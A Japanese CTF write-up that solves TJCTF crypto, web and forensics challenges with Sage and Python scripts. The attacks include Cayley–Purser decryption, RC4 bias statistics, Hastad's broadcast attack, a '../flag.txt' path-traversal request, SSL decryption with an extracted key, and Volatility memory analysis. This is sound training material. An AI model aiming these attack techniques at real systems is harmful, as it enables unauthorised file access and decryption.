tjctf{c4ybe_Wr?t3ing_mW_3ncRypZ10N_MY5klf_W4Snz_v_sm4R9}
tjctf{e4ybe_Wr9t3ing_mQ_3ncRyp\10N_MY5mlf_W4Sn|_v_sm4R?}
tjctf{g4ybe_Wr;t3ing_mS_3ncRyp^10N_MY5olf_W4Sn~_v_sm4R=}
tjctf{h4ybe_Wr4t3ing_m\_3ncRypQ10N_MY5`lf_W4Snq_v_sm4R2}
tjctf{i4ybe_Wr5t3ing_m]_3ncRypP10N_MY5alf_W4Snp_v_sm4R3}
tjctf{j4ybe_Wr6t3ing_m^_3ncRypS10N_MY5blf_W4Sns_v_sm4R0}
tjctf{k4ybe_Wr7t3ing_m__3ncRypR10N_MY5clf_W4Snr_v_sm4R1}
tjctf{l4ybe_Wr0t3ing_mX_3ncRypU10N_MY5dlf_W4Snu_v_sm4R6}
tjctf{m4ybe_Wr1t3ing_mY_3ncRypT10N_MY5elf_W4Snt_v_sm4R7}
tjctf{n4ybe_Wr2t3ing_mZ_3ncRypW10N_MY5flf_W4Snw_v_sm4R4}
tjctf{o4ybe_Wr3t3ing_m[_3ncRypV10N_MY5glf_W4Snv_v_sm4R5}
tjctf{p4ybe_Wr,t3ing_mD_3ncRypI10N_MY5xlf_W4Sni_v_sm4R*}
tjctf{q4ybe_Wr-t3ing_mE_3ncRypH10N_MY5ylf_W4Snh_v_sm4R+}
tjctf{r4ybe_Wr.t3ing_mF_3ncRypK10N_MY5zlf_W4Snk_v_sm4R(}
tjctf{t4ybe_Wr(t3ing_m@_3ncRypM10N_MY5|lf_W4Snm_v_sm4R.}
tjctf{v4ybe_Wr*t3ing_mB_3ncRypO10N_MY5~lf_W4Sno_v_sm4R,}
tjctf{x4ybe_Wr$t3ing_mL_3ncRypA10N_MY5plf_W4Sna_v_sm4R"}
tjctf{y4ybe_Wr%t3ing_mM_3ncRyp@10N_MY5qlf_W4Sn`_v_sm4R#}
tjctf{z4ybe_Wr&t3ing_mN_3ncRypC10N_MY5rlf_W4Snc_v_sm4R }
tjctf{`4ybe_Wr

英文として意味が通りそうなフラグを選んだら通った。

tjctf{m4ybe_Wr1t3ing_mY_3ncRypT10N_MY5elf_W4Snt_v_sm4R7}

Sarah's Cryptosystem (Cryptography 60)

問題のタイトルから暗号の種類を特定する。Cayley–Purser algorithmのようだ。以下を参考に復号する。

https://en.wikipedia.org/wiki/Cayley%E2%80%93Purser_algorithm
http://www.geocities.jp/midarekazu/matrix.html

以下が成り立つので、与えられたパラメータから復号する。

c * (gamma * beta - inv(alpha) * gamma) = inv(alpha) - beta
kai = c * gamma + e
lam = kai.inverse() * epsilon * kai
mu = lam * mu_prime * lam　※mu: 復号結果

復号結果は2×2の行列なので、0行0列、0行1列、1行0列、1行1列の順に数値を文字に変換して、結合する。

# solve.sage
n = 14678582949426387051583136040455803382111419934165976555967410717578108685173293909893707428060574534387147043662980233493070333867526564630646606195171973454732346210530445592981735448140608367433802310679262003264086048483330926831158965247002647763969506296491800206264566632210018217460947909473322948120728022781961264083482251077179808522571497366192225541800367737775624875274409378360680791167750022903325344080185661894498877429106792051549616294445505734756445036773060160075172879734624325424601794213946464848991659189822047433670420325360836239402912250660089868320598256013395839998681853749012528228581

alpha = matrix(Zmod(n), [[8775523445886632877189593855724016105923853238110388600944519847143895931293223855922653616887818042631073479198110684379321723227593601822918289162810287213179985843203577275519823312297337476543699814699295603780534270489652026567901889418668978700166470523932709861086261372827841681274942513882086473642725585135101230370081888674776607714279827857691943339921005145456087934796083827529605415734994951876822070091633768569949775791638494032484021726668931928950677970506977610850040146356447929936780822436403930820545470690234566354431325668976387986291875340697228987789945329449200068296170375614076050879785, 10914524698710595970321127027090232144165968780037471063432770955497704137163051702799686631313041237560141667848373235442103054608670912249269855896811394714345108278448088454633357108221934703236017373213591822419492870186573388565800341211631487277520861910315169726614530318669774452500398973789004100413146262726432287549267494369387541010183759368058060150046771812028618651061152940554853598757579002480497094323215709965636785996674504414081628163168221618141288158620642854534927045304055157302218392073869315722029506251754742712127700711498342611023211817174640260717060042688885087479683913557571909322741], [7157097076807988382820230716569936455045674994109312852250577929895736096519606523374055940413673063662855431457666708138113796135396777078373960733319810698100562529245781853196798527091875213512132913044623809323407761879224741043837559073372914528336917930561267239951428201709786511309170906978181350528532725746865810552547336005227276113230516321894984875520782802662233942788568094083797220677632043304323815963819260590985920987957137053105329635183018297003173809322151759301586528750262563904360082125151280110181914762714140881033279744601200352729150802483479611105828702510738590423345140053057578524340, 6713517055261601175137199194349037776884391949750887153570211478360609355102967635024812020436930124099492062499378568948225812905028941236992161990751892519351796091752765093957342028716103643486587421078902623905472869718701549301991454011667516034361143511456327353811233114869084210135013109411719670903088224240407539506990465851216587326439231276390112484389076650763830466007812636524179883923113881730406583476993810068817032731764701328227580833401955012377095618568561222016759038286127435444274370666887116694944714906875307424805468192270291152231535013278536905457590268616934245276058674669841799113000]])
beta = matrix(Zmod(n), [[12810735484592687475611067000733910475407959255726938964445865510797360682518042234111788624482348253873675205750379533519653600377466554571549725126735899237320794286392351216351163142150947930793285681157153739873680235151717822189508483187266968937840184927172004631125869801171730273839416495272679596762491128032081715204511086070136862783519124351766930742835431179567064478518796272613388247961834821952570326773065235010566961759660603378159648515475855652044014147336517739031539091701655351031055956799114677224875340483094077563775106615052814649767904459580694503137691824535465579841465656799088385158184, 5473642859795523867833744594642413120108472695987405903092128057784530587542920832212387191217752619328277772827610816009681072385077130472910935496153590538664127336809080066339982095054400770410661108644231317771694643744529400989304882179751725342517277312600577613299747065205530030840353840528208991751919855348274256156989437092383943692362355213688529247118405117679336493204906404070181358635721597885844629007865171487595667542012053680470870441869320997247103844383487375469966170305723116660050719640797029789529431834500103108427981321996630378373859429074160615524314703440598519278440916672490604153920], [13360817683734425907882869818387715917823570500779542648139881285594085839307884087170316732892285057644413961106686702548122776388566314151602576134967429938148568359628406913487102447957478975857422968377905367007255678006848155389204533214902608595212870988879519805436914172362269969647424235793945764717194382563938554317735619273113439313925766674058624269423418548409043902139520249198229905104623538910887468568657824562399052674509890480922031471957602349880575143764865589002518416822823718373354855636110399881258158604068094158661436001036363550606724638058264988946662672731808136009525669966413346830771, 11468410759599236635289052912588911752422573812150145093904993075149484717580340039481523574675433246733347559877762204982600910077123361122258919844601069472735734932609308953048318256198076234640234139592390905314780413453276360192939595448983886080692089673968929164049655081883685358729758224963749521058341303254696491886950891802778644958745186969893311825203619560214820869460365078215849849124479129495345651512821938654650764639191895571807669232427640112077550730446976794444904863440462011108462395868920803221927297239615558407269413543933560885245839360611664257149625120359949226340501748237522041814167]])
gamma = matrix(Zmod(n), [[8974468230919934099206660576279424449497301852364989153036761168858007344533698037386796827211384328629017837524968363275804995875927577734686609421586684272633348191411693574979321023787212983912221475247860537390362046603629961287235797201556980167513141941168597299233052362222944059064374704020090477871823209626756840704609536921524143960339208893818545992537157471214137960274837610171236744600814714862928730197678579742105704214054822862593357666332950197265426170385072044723785511598793270720596355301285113545159975155209975455186823617585677822352197860436786511800833967339913846225776224546725792541520, 9348474986948437407830611381930796417076181343543633204466467018618007961332994440548537170881111598282300398838403220784637434773325124478963236440587878188677991827315886822018947642220599876747471178815812118951916817010191177047705089048910549002617216646224139781669862185568251097552368622389943664551466943434989962245869206459898126080327957813064720085824151158276722547935648805466702908342289509228148396591724592467606473409258370670569095588764643480541155047718125969649815181530297399896574878462796500132797468732289756350942722963262157882852028757481193014591962402361412541547286212463585329356315], [6306347499602839310711897806816115365577798048588869401080589959551960579025882710953775758799196156090574498840338655413952106340930233167025430911291561146300436232756032168584609901161123027915957142144417373944831498112379530014743564725043850573029577893137274785944999828913842318958600038316305161651550987813123688899364506103198777508061052140024401991543826294645053810175935470329060181419638113822346335627126011428883634941577955928094830457687467602021018818112233819135752762796122449991940293951126794842445023346469946015215788444862522482934643865011428843298464296450568025153162421666513865829972, 10460558892626942486591136156075757543686422206929425172766487988979302284782458711707743391644192252658479654211588038112081380743223452728011518065689480909606243379075821247336392033167618986362705759995101660106860761650744887913049696267564350252223724264010048527822196072691569796251914527187015010584106518547809025845913716411807489385594922654444064967642748725710272671436875870600558952201656006726706186246198382807891707075834051796788676605755301264887244933074977001813150376143934759392995053660467071628525606350521290098742782796859849651804582344638795615115444324738258958494327221705047139386067]])
mu_prime = matrix(Zmod(n), [[9110140425150750491145178173245810683649850676433167642203918443227873747929200498497484988659356796565844607239572829879322347251589944478091113697792108086550736898839464575439745480624731810294886238002427135623698710042800014612820928298917430445137640355738788165343967441826643874136160621009753218683651627226187219386196831000264065035194030979035604667050555295409076871639269434935429836264844914788522151184701643589729070919260048693228620818713776827956449530727987176756766935883945609304801285829253475548773757845833684396147327615752864245759762697131554282702952182820064236136029154931285534920336, 3965680634933532371253173918575965512311075743978870329108827645259543845600676708465361739792712505100830375151369030591386585033111483748387572594721593780367638957423544648137126096616048548831526404791201118063342916940780558823392780847378257409456603871959593407713453397146511731920904022568991968961066446033963676957027561582191560877662951544766699653019054058615445793884586251692712331360647356139500007887786373834135022309564632684555593104495467262752494409415310095975103762605447355421569804147145717716270216276407829288807696993083792180120763011612628844075543633935302644043351200000415397765490], [11531027939277663954924629808580850615128112189088429194733892444735389287125194989846483062137239631428856897300952091045885111504233971340222047595797974590299676147530138095131682563465058026356505341896547427515760211337648937509712681168680093916223136691048129594400887163117578083595198924212238020929650571543544239651025512948151083606981283495326581076022774788713191375373448616247020080804624589709887909060660751012839089160151250018439586685425207828386848506215840120679779020276348065756876412067877471560174945643434266029362965328759176908923082695706418412446830824537449603065572349763237675405751, 920729326437589730826095157469278350649316030890671041698866840091079079560109369898686162156986131867647612585803281076434525638323194196281197301522301314276691124338087536821687420513860352733995693071965887098334916285637808557203009371600993398395622919226813090045525901909117810003835895044704787089673163783368582595086734902024400720579716370279086180005814810492044173344668033992612757135892010975432640563801946449146558990089998260694779271111218515320264883756992522656100346966776474372573294784374889012500155152418754863716677395313380366718512341128264823401715112635658331018694834964614709946974]])
epsilon = matrix(Zmod(n), [[7165571226081578603835883150774616488728231051550287925851522690184895637139822876962972947112432251543801438173797575868444468354880336070457468476668646627601203589691836971847199834387550427409515139148865668672460930793878765006885214789102699287706918802228358033100073207658646769916917956918825343988728574869415991085833912621668186850044268946624373249357696907897355173351832256550108577060760939032564672939219868381918863800411991549406942127512322082415984088851421306484618925402688553375021971356743060341861158734723134788643394112904978199797407328350398837621015931420540971820281023718934332599845, 5311927137961618089465719533669959680179138808868451304787316556962730054216658384560427124537238182468330318432740185730773011315312521714917801639551804882300325955312260236798444551041370383751633970374956257915677214485582117483657761988919505553702104281197415775417014673469569050740206878224979551841366120847702679675682180740324259166151472145699221113252321870669004434874193357913127321023174144885899598070482292843947693798831055666003932625354269654187369701819908413086086194211158098010905312163522905960656367473770480743567823177465080036681918250028808180971378615523862092243350157331116954510698], [5453403043375115387776266465045212861994650155363814552052041113915923817009277472100191728376696957972330437923466587434020093694118621324930290244063889644426827678183126312734629316012791372652267229717880892934548663470390609038951254084596015737291790063273550517220952776485662834693648438708321765082221299643494798339214081530177171662673636605795986063100859446521438876886565157432362462831922149860311355669958620420565847240178703164000319792911764660820039884624929685147146215415904174517092317941864314088161460161442692320572464940560312915345911620266153658276926959641065541429189055966572657819520, 8323469275066655448490909899298437394080014136310987828663208635319609649256368613984492690212315915186764103523691677459103067777742206989452982676893533104930578345264505397629965506625890692620772096629332559013546209414474810863008128641233795446820695233160679181797421280038279121493037666374980800557085234506092778791238441904325008190674790187457682574952384888322563227452064207503676722597347894574663980629407710256847944722991203811304660432558564858911789500224117526382180259239886812006033221746547987173629026862386738990593399748341700938726003025625367055626519666645593341751948026564983517392940]])

e = matrix(Zmod(n), [[1, 0], [0, 1]])

inv_alpha = alpha.inverse()
c = (inv_alpha - beta) * (gamma * beta - inv_alpha * gamma).inverse()
kai = c * gamma + e

lam = kai.inverse() * epsilon * kai
mu = lam * mu_prime * lam

msg = ''
for i in range(2):
    for j in range(2):
        msg += ('%x' % mu[i][j]).decode('hex')

print msg

実行結果は以下の通り。

The Cayley-Purser algorithm was a public-key cryptography algorithm published in early 1999 by 16-year-old Irishwoman Sarah Flannery, based on an unpublished work by Michael Purser, founder of Baltimore Technologies, a Dublin data security company. Flannery named it for mathematician Arthur Cayley. It has since been found to be flawed as a public-key algorithm, but was the subject of considerable media attention. Nice job! Your flag is tjctf{c0uld_th1s_b3_tH3_n3Xt_RS4?}

tjctf{c0uld_th1s_b3_tH3_n3Xt_RS4?}

Programmable Hyperlinked Pasta (Web 60)

HTMLソースを見ると、コメントに以下のように書いてある。

<!-- <a href="flag.txt">Here's a flag!</a> -->

https://programmable_hyperlinked_pasta.tjctf.org/flag.txtにアクセスすると、Forbidden表示。
https://programmable_hyperlinked_pasta.tjctf.org/?lang=flag.txtにアクセスしても何も表示されない、
https://programmable_hyperlinked_pasta.tjctf.org/?lang=../flag.txtにアクセスすると、フラグが表示された。

tjctf{l0c4l_f1l3_wh4t?}

Permutations (Cryptography 70)

emはmessageの文字の順序が変わったもので、順序を指定できる。変わった文字列について、RC4の暗号処理と同じ処理をしている。
http://inaz2.hatenablog.com/entry/2013/11/30/233649 を参考にして、RC4暗号の脆弱性を使う。
RC4はランダムな鍵に対して、暗号の2バイト目に偏りがあるという性質があるらしい。
1文字に対して、2**16回データを取れば、ほぼ確実に復元できそうだが、途中でサーバから接続を拒否される。
以下のようなコードで何回もデータを取得して、統計を取りながらmessageを推測する。

import socket
from collections import Counter

CHARS = 'abcdefghij'

def replace_2nd_str(pos):
    target = CHARS[pos]
    base = CHARS.replace(target, '')
    return base[0] + target + base[1:]

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('problem1.tjctf.org', 8007))


## index setting ##
idx = 9
print 'index =', idx
send_str = replace_2nd_str(idx)
print 'send_str =', send_str
###################

results = [0] * 256
for j in range(2**10):
    data = recvuntil(s, '\n')
    #print data
    #print send_str
    s.sendall(send_str + '\n')
    data = recvuntil(s, '\n')
    #print data
    second_value = int(data[2:4], 16)
    results[second_value] += 1

# Top 10 -> Guess
freq_map = dict((chr(i), n) for i, n in enumerate(results))
top10_freq = Counter(freq_map).most_common(10)
print top10_freq

10文字について統計を取る。意味がありそうな単語を考えながら、それぞれ回数が多いものを選択する。

ohbyteRC4!

tjctf{ohbyteRC4!}

Ssleepy (Forensics 70)

No.55パケットからkey.zipを抽出する。解凍すると、秘密鍵が入っている。WiresharkでSSLの秘密鍵を設定し、復号する。

IP address: 104.155.183.43
Port: 443
Protocol: http
Key File: server_key.pem

No.91パケットでflag.jpgをGETしている。SSL Streamからヘッダ部分を除いて保存する。

JPG画像にフラグが書いてあった。

TJCTF{WIRESHARK_OR_SHARKWIRE?}

Affine (Cryptography 90)

RSA暗号。Linear Padding ありの Hastad's broadcast attack で復号する。

# solve.sage
import binascii
import hashlib

def get_sha1_val(n):
    s = str(n)
    return int(hashlib.sha1(s).hexdigest(), 16)

def hastads(cArray, nArray, e=3):
    if(len(cArray)==len(nArray)==e):
        for i in range(e):
            cArray[i] = Integer(cArray[i])
            nArray[i] = Integer(nArray[i])
        M = crt(cArray, nArray)
        return(Integer(M).nth_root(e, truncate_mode = 1))
    else:
        print("CiphertextArray, ModulusArray, need to be of the same length, and the same size as the public exponent")


def linearPaddingHastads(cArray, nArray, aArray, bArray, e=3, eps=1/8):
    if(len(cArray) == len(nArray) == len(aArray) == len(bArray) == e):
        for i in range(e):
            cArray[i] = Integer(cArray[i])
            nArray[i] = Integer(nArray[i])
            aArray[i] = Integer(aArray[i])
            bArray[i] = Integer(bArray[i])
        TArray = [-1] * e
        for i in range(e):
            arrayToCRT = [0] * e
            arrayToCRT[i] = 1
            TArray[i] = crt(arrayToCRT, nArray)
        P.<x> = PolynomialRing(Zmod(prod(nArray)))
        gArray = [-1] * e
        for i in range(e):
            gArray[i] = TArray[i] * (pow(aArray[i] * x + bArray[i], e) - cArray[i])
        g = sum(gArray)
        g = g.monic()

        roots = g.small_roots(epsilon=eps)
        if(len(roots) == 0):
            print("No Solutions found")
            return -1
        return roots[0]

    else:
        print("CiphertextArray, ModulusArray, and the linear padding arrays need to be of the same length," +
         "and the same size as the public exponent")

e = 7
c1 = 25675152793958719362334087721727391668448541269558474462058064394972159237000883064745181284990149430303994650254840808322285864424764662750758365258432516187277728432545121586632979071929720717372649852913892333751596445815629910986053617473309414117281508303864323015909729484176490149898837722699148713920
n1 = 54820850259230535713865762084053568598874165594889130921566357696567616458378223857125838179921247755779292651871389981326670333442531734034645787606469134086461755105756873542385262892705242036071092223909243076301288478970799478306200287979706335286360412748167842364774735931863312933459243303887522528391
c2 = 57308013526198545787982553948831809099851386105071990727531071444194085081579444566800636703889823370213270842463375590828873179217670044197203168310866488084951374039873986096323030668989182846970273681633505685451818817121768616521795719540659814758454867045257226628730810691032850312088913937303862882122
n2 = 67042885520113263257118582290915177726312067469305908421847091179458757706749309299748971618010292667467149507645154486731380778917902476712952533653072795121865441967660602104613553639256754364241221379654359806670189462881506603085709273149985124690193140730266494965592337203461719611664879731308442667263
c3 = 33110523123312260880081423555385443012303698172724771306631372977777151188742699147449635911533782126548764489332497744201412222554852174681172644368277681280915180074419448681945399626487120057542603151103185868489294327151872456579497138539267121640657739423771314684090862694233758364464062279576183369864
n3 = 89985903111062000750924862108702084890290895192415633459163185350709370560849833696152316610647261365568603949891418963071575903453535955968749606939308123918445104540664601366419086133203411546299071992836870605114904775854946592687074623268960160934703771624447420985649938872471694356563590766730197327403
c4 = 77165065219653079862788577409129548279406192392832794127838745876446556297639145098957541474822063761739525311525724748975610206392909917884098887559908520069178582499123002341170033386358914463615518679156743215944833734844115997551919528578190653678286086414529205023645066772036171138071616232877775605403
n4 = 144578302659584152347777465183436595903641766254529841392977311918530263082334666488588492466964216842999000372858566667614430156791250833413367447725549300629307438383795112436448806559178858641149273056506193797949883101855228392777056665762363186560765549679621056726762476210940818128164542265216341911939
c5 = 46271592501512251239515544795747628191312494429121209907428975357753036096630585200765478229722279396220792499619124493513510693983433382775572503427829128432022799757398620804968227918699155484285929229454795772848632082074482660485353695038777422951895467676109703028615278915540633833992415540610914983525
n5 = 81790853226916934420573308748178318312510297162048844558315472184092957619321358751015078340781526837894903889782215325030254199582839010410447598969896414596873084948080977190437730775429382394893464902480690706275903017575378639142460124842161392405763583944706204061213376653979366112584588092058682099417
c6 = 57972675706457917594665689255141579755155126009393865090298137419620210832764812601374723742797175858601067071946998126997761266747079093136254796588168914305806501548651843044824561414391997008162345918166144951125302582440652239957438322070733320483325829334015651431547367283983778089203231241439641536053
n6 = 73980671682765133866918944940688116769134506866614012447817086969352897977409302191352722713709039627538976182650104228953961415306661290440291237838436045597491167374142468246641210294363030243026142729058264151545938090328689572424665075464153066787542386012683130559707032305120020753104044623180909126389
c7 = 74509805178973331475079616531075721234040785222421585008716026412829278145513552037640729538030768473876697345668551073431575270064366725987077833033222424840594603003480258191710744801632493056419255044343812108962552981039079556936296909043802657927151112869685008200474696033705827864953556606633891316209
n7 = 101172221238421792469887500553169614463346581090545073620543862634624608075572127513912303221239410360993953141778328809955385117874857059456679461625991923555648318729750420461377497354534152316919725646852519813952867617919442629999348382422210047284124959833853082144643826524296782324540575133270263491143

nArr = [n1, n2, n3, n4, n5, n6, n7]
cArr = [c1, c2, c3, c4, c5, c6, c7]
aArr = [1] * 7
bArr = []
bArr.append(get_sha1_val(n1))
bArr.append(get_sha1_val(n2))
bArr.append(get_sha1_val(n3))
bArr.append(get_sha1_val(n4))
bArr.append(get_sha1_val(n5))
bArr.append(get_sha1_val(n6))
bArr.append(get_sha1_val(n7))

msg = linearPaddingHastads(cArr, nArr, aArr, bArr, e=e, eps=1/16)
msg = hex(int(msg))[2:]
if(msg[-1]=='L'):
    msg = msg[:-1]
if(len(msg)%2 == 1):
    msg = '0' + msg
flag = binascii.unhexlify(msg)
print flag

tjctf{b3ware_of_th3_g3n3ralization}

Volatile Virus (Forensics 130)

メモリダンプファイルが与えられている。
volatilityでいろいろ調査する。

$ volatility -f file_patched.dmp imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP0x86, Win7SP1x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : WindowsCrashDumpSpace32 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/mnt/hgfs/Shared/work/file_patched.dmp)
                      PAE type : PAE
                           DTB : 0x185000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2018-08-06 03:58:15 UTC+0000
     Image local date and time : 2018-08-05 20:58:15 -0700
$ volatility -f file_patched.dmp --profile=Win7SP1x86 pstree
Volatility Foundation Volatility Framework 2.5
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0x860b33a8:explorer.exe                             2292   2276     48   1248 2018-08-06 03:13:12 UTC+0000
. 0x86139d20:chrome.exe                              3968   2292     35   1264 2018-08-06 03:14:13 UTC+0000
.. 0x850d0d20:chrome.exe                             3500   3968      6    143 2018-08-06 03:16:00 UTC+0000
.. 0x85106030:chrome.exe                             3496   3968      6    127 2018-08-06 03:53:44 UTC+0000
.. 0x861c3d20:chrome.exe                             2896   3968      6    173 2018-08-06 03:54:08 UTC+0000
.. 0x8507b3e0:chrome.exe                              548   3968      6    155 2018-08-06 03:18:16 UTC+0000
.. 0x8617ab50:chrome.exe                             1108   3968      6    134 2018-08-06 03:53:57 UTC+0000
. 0x8506b030:python.exe                              2976   2292      1     58 2018-08-06 03:15:14 UTC+0000
. 0x861d6030:taskmgr.exe                             3880   2292      5    110 2018-08-06 03:53:21 UTC+0000
. 0x856c9ac0:VBoxTray.exe                            2436   2292     13    151 2018-08-06 03:13:16 UTC+0000
. 0x85115c00:DumpIt.exe                              3172   2292      6     93 2018-08-06 03:58:14 UTC+0000
 0x85d851d8:winlogon.exe                              416    372      3    110 2018-08-06 06:11:22 UTC+0000
 0x85d6f030:csrss.exe                                 380    372      8    310 2018-08-06 06:11:22 UTC+0000
. 0x861e7440:conhost.exe                             3436    380      2     40 2018-08-06 03:58:14 UTC+0000
. 0x861eb030:conhost.exe                             3108    380      2     34 2018-08-06 03:15:15 UTC+0000
 0x85d79d20:wininit.exe                               388    324      3     78 2018-08-06 06:11:22 UTC+0000
. 0x85da8398:services.exe                             476    388      7    204 2018-08-06 06:11:23 UTC+0000
.. 0x85f00478:taskhost.exe                           1416    476      9    204 2018-08-06 03:11:36 UTC+0000
.. 0x85dea030:VBoxService.ex                          648    476     11    118 2018-08-06 06:11:27 UTC+0000
.. 0x85df2b00:svchost.exe                             712    476      8    253 2018-08-06 03:11:29 UTC+0000
.. 0x84f41d20:svchost.exe                            1040    476      5     90 2018-08-06 03:11:43 UTC+0000
.. 0x8603c030:sppsvc.exe                              284    476      4    147 2018-08-06 03:11:42 UTC+0000
.. 0x84fb3030:wlms.exe                               1840    476      4     46 2018-08-06 03:11:40 UTC+0000
.. 0x85e9a528:svchost.exe                            1156    476     16    475 2018-08-06 03:11:33 UTC+0000
.. 0x85f4c178:svchost.exe                            1576    476     11    312 2018-08-06 03:11:37 UTC+0000
.. 0x85e333c8:svchost.exe                             892    476     32   1007 2018-08-06 03:11:30 UTC+0000
.. 0x85edb610:spoolsv.exe                            1324    476     13    277 2018-08-06 03:11:35 UTC+0000
.. 0x85f08618:svchost.exe                            1456    476     17    292 2018-08-06 03:11:36 UTC+0000
.. 0x85e29030:svchost.exe                             840    476     15    362 2018-08-06 03:11:30 UTC+0000
... 0x85df8878:dwm.exe                               2284    840      3     68 2018-08-06 03:13:12 UTC+0000
.. 0x85f8b998:cygrunsrv.exe                          1716    476      6    101 2018-08-06 03:11:39 UTC+0000
... 0x84f99870:cygrunsrv.exe                         1796   1716      0 ------ 2018-08-06 03:11:40 UTC+0000
.... 0x84fbfd20:sshd.exe                             1876   1796      4    100 2018-08-06 03:11:40 UTC+0000
.. 0x85eba7c0:SearchIndexer.                         2676    476     11    630 2018-08-06 03:13:21 UTC+0000
.. 0x85e1f460:svchost.exe                             800    476     19    435 2018-08-06 03:11:30 UTC+0000
... 0x851315c0:audiodg.exe                           3832    800      4    121 2018-08-06 03:55:37 UTC+0000
.. 0x85f4e338:svchost.exe                            1604    476     16    275 2018-08-06 03:11:37 UTC+0000
.. 0x85629890:svchost.exe                             584    476     10    349 2018-08-06 06:11:26 UTC+0000
... 0x8513f030:WmiPrvSE.exe                          2140    584      7    121 2018-08-06 03:58:15 UTC+0000
.. 0x85e2eb68:svchost.exe                             864    476     29    562 2018-08-06 03:11:30 UTC+0000
.. 0x85e6dd20:svchost.exe                            1020    476      6    116 2018-08-06 03:11:32 UTC+0000
.. 0x85f86030:svchost.exe                            3580    476     12    364 2018-08-06 03:13:43 UTC+0000
. 0x85daf030:lsass.exe                                484    388      7    577 2018-08-06 06:11:23 UTC+0000
. 0x85db0b90:lsm.exe                                  492    388     10    152 2018-08-06 06:11:23 UTC+0000
 0x84f4e248:csrss.exe                                 332    324     10    401 2018-08-06 06:11:21 UTC+0000
. 0x84fb1d20:conhost.exe                             1832    332      2     33 2018-08-06 03:11:40 UTC+0000
 0x84ed1b90:System                                      4      0     83    530 2018-08-06 06:11:13 UTC+0000
. 0x8561b718:smss.exe                                 252      4      2     29 2018-08-06 06:11:13 UTC+0000

この後、チームメンバがkeyloggerの分析をし、フラグの前半を割り出すことができた。

tjctf{th1s_1s_n0t_a_v1ru5_

Chromeを使っていることが分かっているので、volatilityのchromeプラグインで調べてみる。

$ volatility -f file_patched.dmp --profile=Win7SP1x86 chromedownloads --output-file=chromedownloads.txt
$ cat chromedownloads.txt
Row Id Current Path                                                                     Target Path                                                                      Start Time                 Received     Total Bytes  State Danger Interrupt End Time                   Opened Referer                                                          By Ext ID By Ext Name ETag                     Last Modified                  MIME Type                        Original MIME Type              
------ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------- ------------ ------------ ----- ------ --------- -------------------------- ------ ---------------------------------------------------------------- --------- ----------- ------------------------ ------------------------------ -------------------------------- --------------------------------
    16 C:\Users\IEUser\Downloads\1FA71                                                  C:\Users\IEUser\Downloads\1FA71                                                  2018-08-06 03:20:29.210581         1023         1023     1      0         0 2018-08-06 03:20:29.466552      0 https://github.com/kakbkc/literate-sniffle/blob/master/1FA71                           "764c4bbf98...ae31efc16"                                application/octet-stream         application/octet-stream        
    15 C:\Users\IEUser\Downloads\1D218                                                  C:\Users\IEUser\Downloads\1D218                                                  2018-08-06 03:20:14.625735         1047         1047     1      0         0 2018-08-06 03:20:14.859907      0 https://github.com/kakbkc/literate-sniffle/blob/master/1D218                           "7ffee2ea0a...c9f5321eb"                                application/octet-stream         application/octet-stream        
    14 C:\Users\IEUser\Downloads\1CB1C                                                  C:\Users\IEUser\Downloads\1CB1C                                                  2018-08-06 03:20:10.236260         1057         1057     1      0         0 2018-08-06 03:20:10.472951      0 https://github.com/kakbkc/literate-sniffle/blob/master/1CB1C                           "d4b88cb6bf...476d36f43"                                application/octet-stream         application/octet-stream        
    13 C:\Users\IEUser\Downloads\1867D                                                  C:\Users\IEUser\Downloads\1867D                                                  2018-08-06 03:19:59.895695         1068         1068     1      0         0 2018-08-06 03:20:00.128268      0 https://github.com/kakbkc/literate-sniffle/blob/master/1867D                           "604922a225...d51e9633d"                                application/octet-stream         application/octet-stream        
    12 C:\Users\IEUser\Downloads\181F0                                                  C:\Users\IEUser\Downloads\181F0                                                  2018-08-06 03:19:53.215465         1080         1080     1      0         0 2018-08-06 03:19:53.543034      0 https://github.com/kakbkc/literate-sniffle/blob/master/181F0                           "2502cc1653...97cb5eab0"                                application/octet-stream         application/octet-stream        
    11 C:\Users\IEUser\Downloads\1568E                                                  C:\Users\IEUser\Downloads\1568E                                                  2018-08-06 03:19:23.810158         1017         1017     1      0         0 2018-08-06 03:19:24.096658      0 https://github.com/kakbkc/literate-sniffle/blob/master/1568E                           "5c2a1f0d58...9d05baa91"                                application/octet-stream         application/octet-stream        
    10 C:\Users\IEUser\Downloads\11B53                                                  C:\Users\IEUser\Downloads\11B53                                                  2018-08-06 03:19:18.350220         1096         1096     1      0         0 2018-08-06 03:19:18.605699      0 https://github.com/kakbkc/literate-sniffle/blob/master/11B53                           "a8761d8ac6...f2882d0e5"                                application/octet-stream         application/octet-stream        
     9 C:\Users\IEUser\Downloads\112E8                                                  C:\Users\IEUser\Downloads\112E8                                                  2018-08-06 03:19:12.694478         1044         1044     1      0         0 2018-08-06 03:19:12.999087      0 https://github.com/kakbkc/literate-sniffle/blob/master/112E8                           "5e4b476fe5...083dc87cd"                                application/octet-stream         application/octet-stream        
     8 C:\Users\IEUser\Downloads\0FB71                                                  C:\Users\IEUser\Downloads\0FB71                                                  2018-08-06 03:19:06.661971         1075         1075     1      0         0 2018-08-06 03:19:06.903977      0 https://github.com/kakbkc/literate-sniffle/blob/master/0FB71                           "cd9bd42dd9...eab91c4c1"                                application/octet-stream         application/octet-stream        
     7 C:\Users\IEUser\Downloads\0F32D                                                  C:\Users\IEUser\Downloads\0F32D                                                  2018-08-06 03:18:56.779744         1082         1082     1      0         0 2018-08-06 03:18:57.017832      0 https://github.com/kakbkc/literate-sniffle/blob/master/0F32D                           "2076f61c97...f6a944e10"                                application/octet-stream         application/octet-stream        
